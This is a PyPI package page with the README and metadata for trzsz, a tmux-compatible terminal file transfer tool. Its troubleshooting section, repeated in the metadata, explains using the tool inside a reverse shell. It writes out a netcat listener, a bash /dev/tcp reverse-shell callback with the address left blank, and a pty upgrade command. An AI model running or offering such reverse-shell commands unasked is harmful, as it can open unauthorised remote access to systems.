# trzsz
`trzsz` ( trz / tsz ) is a simple file transfer tools, similar to `lrzsz` ( rz / sz ), and compatible with `tmux`.
Website: [https://trzsz.github.io](https://trzsz.github.io) 中文文档:[https://trzsz.github.io/cn](https://trzsz.github.io/cn/)
[![MIT License](https://img.shields.io/badge/license-MIT-green.svg?style=flat)](https://choosealicense.com/licenses/mit/)
[![PyPI trzsz](https://img.shields.io/pypi/v/trzsz?style=flat)](https://pypi.python.org/pypi/trzsz/)
## Why?
Considering `laptop -> hostA -> hostB -> docker -> tmux`, using `scp` or `sftp` is inconvenience.
In this case, `lrzsz` ( rz / sz ) is convenient to use, but unfortunately it's not compatible with `tmux`.
`tmux` is not going to support rz / sz ( [906](https://github.com/tmux/tmux/issues/906), [1439](https://github.com/tmux/tmux/issues/1439) ), and creating a new tools is much easier than patching `tmux`.
## Advantage
- Support **tmux**, including tmux normal mode, and tmux command mode integrated with iTerm2.
- Support **transfer directories**, `trz -d` to upload directories, `tsz -d xxx` to download xxx directories.
- Support **breakpoint resume**, `trz -y` or `tsz -y xxx` overwrite exiting files will auto resume from breakpoint.
- Support **Windows server**, not only can run on Windows client, but also can run on Windows ssh server.
- Support **native terminal**, does not require terminal to support, just use `trzsz ssh x.x.x.x` to login.
- Support **web terminal**, transfer files and directories between local and remote servers over the web.
- Support **drag to upload**, drag and drop files and directories to the terminal to upload to the remote server.
- Support **progress bar**, shows the current transferring file name, progress, size, speed, remaining time, etc.
- Better **interactive experience**, shows the transfer results or errors friendly, `ctrl + c` to stop gracefully.
## Installation
### On the server
- Install [the Go version](https://github.com/trzsz/trzsz-go) ( ⭐ Recommended )
Please check the Go version installation guide: [https://trzsz.github.io/go](https://trzsz.github.io/go)
- Or install with Python3
sudo python3 -m pip install --upgrade trzsz
- Or install with Python2
sudo python2 -m pip install --upgrade trzsz
- Or install with Homebrew
brew update
brew install trzsz
- Or install with Node.js
sudo npm install -g trzsz
Can be installed without `sudo`, just add the installation path ( e.g. `~/.local/bin` ) to the `PATH` environment.
### Supported Terminals
- [trzsz-ssh](https://trzsz.github.io/ssh) ( tssh ) -- simple ssh client with trzsz support ( ⭐ Recommended ).
- [iTerm2](https://iterm2.com/) -- check [the trzsz-iterm2 installation](https://trzsz.github.io/iterm2).
- [tabby](https://tabby.sh/) -- install the [tabby-trzsz](https://github.com/trzsz/tabby-trzsz) plugin.
- [electerm](https://electerm.github.io/electerm/) -- upgrade to `1.19.0` or higher.
- [ttyd](https://github.com/tsl0922/ttyd) -- upgrade to `1.7.3` or higher, and start with `-t enableTrzsz=true`, use `https` unless localhost.
- [trzsz-go](https://trzsz.github.io/go) -- supports all terminals that support a local shell.
- [trzsz.js](https://trzsz.github.io/js) -- making webshell in browser and electron terminal supports `trzsz`.
_Does your terminal supports `trzsz` as well? Please let me know. I would love to have it on the list._
## Trzsz Manual
#### `trz` upload files to the remote server
usage: trz [-h] [-v] [-q] [-y] [-b] [-e] [-d] [-B N] [-t N] [path]
Receive file(s), similar to rz and compatible with tmux.
positional arguments:
path path to save file(s). (default: current directory)
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-q, --quiet quiet (hide progress bar)
-y, --overwrite yes, overwrite existing file(s)
-b, --binary binary transfer mode, faster for binary files
-e, --escape escape all known control characters
-d, --directory transfer directories and files
-r, --recursive transfer directories and files, same as -d
-B N, --bufsize N max buffer chunk size (1K<=N<=1G). (default: 10M)
-t N, --timeout N timeout ( N seconds ) for each buffer chunk.
N <= 0 means never timeout. (default: 20)
#### `tsz` download files from the remote server
usage: tsz [-h] [-v] [-q] [-y] [-b] [-e] [-d] [-B N] [-t N] file [file ...]
Send file(s), similar to sz and compatible with tmux.
positional arguments:
file file(s) to be sent
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-q, --quiet quiet (hide progress bar)
-y, --overwrite yes, overwrite existing file(s)
-b, --binary binary transfer mode, faster for binary files
-e, --escape escape all known control characters
-d, --directory transfer directories and files
-r, --recursive transfer directories and files, same as -d
-B N, --bufsize N max buffer chunk size (1K<=N<=1G). (default: 10M)
-t N, --timeout N timeout ( N seconds ) for each buffer chunk.
N <= 0 means never timeout. (default: 20)
#### Trouble shooting
- If `tmux` is running on the local computer.
- Option 1: Use `tmux -CC` integration with iTerm2, please refer to [iTerm2 tmux Integration](https://trzsz.github.io/tmuxcc).
- Option 2: Install [trzsz-go](https://github.com/trzsz/trzsz-go) on the local computer, use `trzsz ssh` to login after `tmux`.
- If `tmux` is running on the jump server.
- Option 1: Use `tmux -CC` integration with iTerm2, please refer to [iTerm2 tmux Integration](https://trzsz.github.io/tmuxcc).
- Option 2: Install [trzsz-go](https://github.com/trzsz/trzsz-go) on the jump server, use `trzsz -r ssh` to login after `tmux`.
- If an error occurs, and `trzsz` is hanging up.
- Press `control + c` to stop `trz` or `tsz` process on the server.
- For iTerm2 users, press `command + option + shift + r` to stop [iTerm2 Coprocesses](https://iterm2.com/documentation-coprocesses.html).
- If `trz -b` binary upload fails, and login to server using `telnet` or `docker exec`.
- Try to escape all known control characters, e.g., `trz -eb`.
- If `trz -b` or `tsz -b` binary transfer fails, and login to server using `expect`.
- Try to `export LC_CTYPE=C` before the `expect` script. e.g.:
export LC_CTYPE=C
expect -c '
spawn ssh xxx
expect "xxx: "
send "xxx\n"
- If you want to upload and download using `trz / tsz` in a reverse shell, you need to follow these steps:
- 1\. Use `tssh xxx` or `trzsz ssh xxx` to log in to the server.
- 2\. Execute `nc -lnv 1337` on the server, and wait for the reverse shell connection.
- 3\. Reverse connect to the server on the target, such as `bash -i >& /dev/tcp/ 0>&1`.
- 4\. Follow these steps in the reverse shell:
- 4.1. Convert to an interactive shell, such as `python3 -c 'import pty; pty.spawn("/bin/bash")'`.
- 4.2. Press `ctrl + z` to turn the reverse shell into background.
- 4.3. Execute `stty raw -echo; fg` to disable the echo of the server, and return to the reverse shell.
- 4.4. Press the Enter key, and the command line prompt will be displayed.
- 4.5. Set the terminal environment variable `export TERM=xterm-256color` ( not necessary ).
- 4.6. Check if there is a `TMUX` environment variable, clear it with `unset TMUX`.
- 4.7. Now you can use `trz / tsz` to upload and download as normal.
- 5\. After exiting the interactive shell, there will be no echo, type `exit` blindly to exit the reverse shell.
- 6\. Type `reset` blindly on the server and press Enter to reset the default settings of the terminal.
## Screenshot
#### Using trzsz in iTerm2 with `text` progress bar
![using trzsz in iTerm2 with text progress bar](https://trzsz.github.io/images/iterm2_text.gif)
#### Using trzsz in iTerm2 with `zenity` progress bar
![using trzsz in iTerm2 with zenity progress bar](https://trzsz.github.io/images/iterm2_zenity.gif)
#### Using trzsz in tabby with `tabby-trzsz` plugin
![using trzsz in tabby with tabby-trzsz plugin](https://trzsz.github.io/images/tabby_trzsz.gif)
## Contact
Feel free to email the author <lonnywong@qq.com>, or create an [issue](https://github.com/trzsz/trzsz/issues). Welcome to join the QQ group: 318578930.
Want to buy the author a drink 🍺 ?
![sponsor wechat qrcode](https://trzsz.github.io/images/sponsor_wechat.jpg)
![sponsor alipay qrcode](https://trzsz.github.io/images/sponsor_alipay.jpg)
Raw data
"_id": null,
"home_page": "https://trzsz.github.io",
"name": "trzsz-svr",
"maintainer": "",
"docs_url": null,
"requires_python": "",
"maintainer_email": "",
"keywords": "trzsz trz tsz lrzsz rz sz tmux iTerm2 progressbar",
"author": "Lonny Wong",
"author_email": "lonnywong@qq.com",
"download_url": "https://files.pythonhosted.org/packages/22/a0/e9a530592ecc36d0ccc2dae6cabb45540d3b6da5bf5fb2d6dc79ae999544/trzsz-svr-1.1.4.tar.gz",
"platform": null,
"description": "# trzsz\n\n`trzsz` ( trz / tsz ) is a simple file transfer tools, similar to `lrzsz` ( rz / sz ), and compatible with `tmux`.\n\nWebsite: [https://trzsz.github.io](https://trzsz.github.io) \u3000\u4e2d\u6587\u6587\u6863\uff1a[https://trzsz.github.io/cn](https://trzsz.github.io/cn/)\n\n[![MIT License](https://img.shields.io/badge/license-MIT-green.svg?style=flat)](https://choosealicense.com/licenses/mit/)\n[![PyPI trzsz](https://img.shields.io/pypi/v/trzsz?style=flat)](https://pypi.python.org/pypi/trzsz/)\n\n## Why?\n\nConsidering `laptop -> hostA -> hostB -> docker -> tmux`, using `scp` or `sftp` is inconvenience.\n\nIn this case, `lrzsz` ( rz / sz ) is convenient to use, but unfortunately it's not compatible with `tmux`.\n\n`tmux` is not going to support rz / sz ( [906](https://github.com/tmux/tmux/issues/906), [1439](https://github.com/tmux/tmux/issues/1439) ), and creating a new tools is much easier than patching `tmux`.\n\n## Advantage\n\n- Support **tmux**, including tmux normal mode, and tmux command mode integrated with iTerm2.\n- Support **transfer directories**, `trz -d` to upload directories, `tsz -d xxx` to download xxx directories.\n- Support **breakpoint resume**, `trz -y` or `tsz -y xxx` overwrite exiting files will auto resume from breakpoint.\n- Support **Windows server**, not only can run on Windows client, but also can run on Windows ssh server.\n- Support **native terminal**, does not require terminal to support, just use `trzsz ssh x.x.x.x` to login.\n- Support **web terminal**, transfer files and directories between local and remote servers over the web.\n- Support **drag to upload**, drag and drop files and directories to the terminal to upload to the remote server.\n- Support **progress bar**, shows the current transferring file name, progress, size, speed, remaining time, etc.\n- Better **interactive experience**, shows the transfer results or errors friendly, `ctrl + c` to stop gracefully.\n\n## Installation\n\n### On the server\n\n- Install [the Go version](https://github.com/trzsz/trzsz-go) ( \u2b50 Recommended )\n\n Please check the Go version installation guide: [https://trzsz.github.io/go](https://trzsz.github.io/go)\n\n- Or install with Python3\n\n ```\n sudo python3 -m pip install --upgrade trzsz\n ```\n\n- Or install with Python2\n\n ```\n sudo python2 -m pip install --upgrade trzsz\n ```\n\n- Or install with Homebrew\n\n ```\n brew update\n brew install trzsz\n ```\n\n- Or install with Node.js\n ```\n sudo npm install -g trzsz\n ```\n\n Can be installed without `sudo`, just add the installation path ( e.g. `~/.local/bin` ) to the `PATH` environment.\n\n### Supported Terminals\n\n- [trzsz-ssh](https://trzsz.github.io/ssh) ( tssh ) -- simple ssh client with trzsz support ( \u2b50 Recommended ).\n\n- [iTerm2](https://iterm2.com/) -- check [the trzsz-iterm2 installation](https://trzsz.github.io/iterm2).\n\n- [tabby](https://tabby.sh/) -- install the [tabby-trzsz](https://github.com/trzsz/tabby-trzsz) plugin.\n\n- [electerm](https://electerm.github.io/electerm/) -- upgrade to `1.19.0` or higher.\n\n- [ttyd](https://github.com/tsl0922/ttyd) -- upgrade to `1.7.3` or higher, and start with `-t enableTrzsz=true`, use `https` unless localhost.\n\n- [trzsz-go](https://trzsz.github.io/go) -- supports all terminals that support a local shell.\n\n- [trzsz.js](https://trzsz.github.io/js) -- making webshell in browser and electron terminal supports `trzsz`.\n\n _Does your terminal supports `trzsz` as well? Please let me know. I would love to have it on the list._\n\n## Trzsz Manual\n\n#### `trz` upload files to the remote server\n\n```\nusage: trz [-h] [-v] [-q] [-y] [-b] [-e] [-d] [-B N] [-t N] [path]\n\nReceive file(s), similar to rz and compatible with tmux.\n\npositional arguments:\n path path to save file(s). (default: current directory)\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --version show program's version number and exit\n -q, --quiet quiet (hide progress bar)\n -y, --overwrite yes, overwrite existing file(s)\n -b, --binary binary transfer mode, faster for binary files\n -e, --escape escape all known control characters\n -d, --directory transfer directories and files\n -r, --recursive transfer directories and files, same as -d\n -B N, --bufsize N max buffer chunk size (1K<=N<=1G). (default: 10M)\n -t N, --timeout N timeout ( N seconds ) for each buffer chunk.\n N <= 0 means never timeout. (default: 20)\n```\n\n#### `tsz` download files from the remote server\n\n```\nusage: tsz [-h] [-v] [-q] [-y] [-b] [-e] [-d] [-B N] [-t N] file [file ...]\n\nSend file(s), similar to sz and compatible with tmux.\n\npositional arguments:\n file file(s) to be sent\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --version show program's version number and exit\n -q, --quiet quiet (hide progress bar)\n -y, --overwrite yes, overwrite existing file(s)\n -b, --binary binary transfer mode, faster for binary files\n -e, --escape escape all known control characters\n -d, --directory transfer directories and files\n -r, --recursive transfer directories and files, same as -d\n -B N, --bufsize N max buffer chunk size (1K<=N<=1G). (default: 10M)\n -t N, --timeout N timeout ( N seconds ) for each buffer chunk.\n N <= 0 means never timeout. (default: 20)\n```\n\n#### Trouble shooting\n\n- If `tmux` is running on the local computer.\n\n - Option 1: Use `tmux -CC` integration with iTerm2, please refer to [iTerm2 tmux Integration](https://trzsz.github.io/tmuxcc).\n - Option 2: Install [trzsz-go](https://github.com/trzsz/trzsz-go) on the local computer, use `trzsz ssh` to login after `tmux`.\n\n- If `tmux` is running on the jump server.\n\n - Option 1: Use `tmux -CC` integration with iTerm2, please refer to [iTerm2 tmux Integration](https://trzsz.github.io/tmuxcc).\n - Option 2: Install [trzsz-go](https://github.com/trzsz/trzsz-go) on the jump server, use `trzsz -r ssh` to login after `tmux`.\n\n- If an error occurs, and `trzsz` is hanging up.\n\n - Press `control + c` to stop `trz` or `tsz` process on the server.\n - For iTerm2 users, press `command + option + shift + r` to stop [iTerm2 Coprocesses](https://iterm2.com/documentation-coprocesses.html).\n\n- If `trz -b` binary upload fails, and login to server using `telnet` or `docker exec`.\n\n - Try to escape all known control characters, e.g., `trz -eb`.\n\n- If `trz -b` or `tsz -b` binary transfer fails, and login to server using `expect`.\n\n - Try to `export LC_CTYPE=C` before the `expect` script. e.g.:\n ```\n #!/bin/sh\n export LC_CTYPE=C\n expect -c '\n spawn ssh xxx\n expect \"xxx: \"\n send \"xxx\\n\"\n interact\n '\n ```\n\n- If you want to upload and download using `trz / tsz` in a reverse shell, you need to follow these steps:\n\n - 1\\. Use `tssh xxx` or `trzsz ssh xxx` to log in to the server.\n - 2\\. Execute `nc -lnv 1337` on the server, and wait for the reverse shell connection.\n - 3\\. Reverse connect to the server on the target, such as `bash -i >& /dev/tcp/ 0>&1`.\n - 4\\. Follow these steps in the reverse shell:\n - 4.1. Convert to an interactive shell, such as `python3 -c 'import pty; pty.spawn(\"/bin/bash\")'`.\n - 4.2. Press `ctrl + z` to turn the reverse shell into background.\n - 4.3. Execute `stty raw -echo; fg` to disable the echo of the server, and return to the reverse shell.\n - 4.4. Press the Enter key, and the command line prompt will be displayed.\n - 4.5. Set the terminal environment variable `export TERM=xterm-256color` ( not necessary ).\n - 4.6. Check if there is a `TMUX` environment variable, clear it with `unset TMUX`.\n - 4.7. Now you can use `trz / tsz` to upload and download as normal.\n - 5\\. After exiting the interactive shell, there will be no echo, type `exit` blindly to exit the reverse shell.\n - 6\\. Type `reset` blindly on the server and press Enter to reset the default settings of the terminal.\n\n## Screenshot\n\n#### Using trzsz in iTerm2 with `text` progress bar\n\n![using trzsz in iTerm2 with text progress bar](https://trzsz.github.io/images/iterm2_text.gif)\n\n#### Using trzsz in iTerm2 with `zenity` progress bar\n\n![using trzsz in iTerm2 with zenity progress bar](https://trzsz.github.io/images/iterm2_zenity.gif)\n\n#### Using trzsz in tabby with `tabby-trzsz` plugin\n\n![using trzsz in tabby with tabby-trzsz plugin](https://trzsz.github.io/images/tabby_trzsz.gif)\n\n## Contact\n\nFeel free to email the author <lonnywong@qq.com>, or create an [issue](https://github.com/trzsz/trzsz/issues). Welcome to join the QQ group: 318578930.\n\nWant to buy the author a drink \ud83c\udf7a ?\n\n![sponsor wechat qrcode](https://trzsz.github.io/images/sponsor_wechat.jpg)\n![sponsor alipay qrcode](https://trzsz.github.io/images/sponsor_alipay.jpg)\n",
"bugtrack_url": null,
"license": "MIT License",
"summary": "trzsz is a simple file transfer tools, similar to lrzsz ( rz / sz ) and compatible with tmux, which works with iTerm2 and has a nice progress bar.",
"version": "1.1.4",
"project_urls": {
"Homepage": "https://trzsz.github.io"
"split_keywords": [
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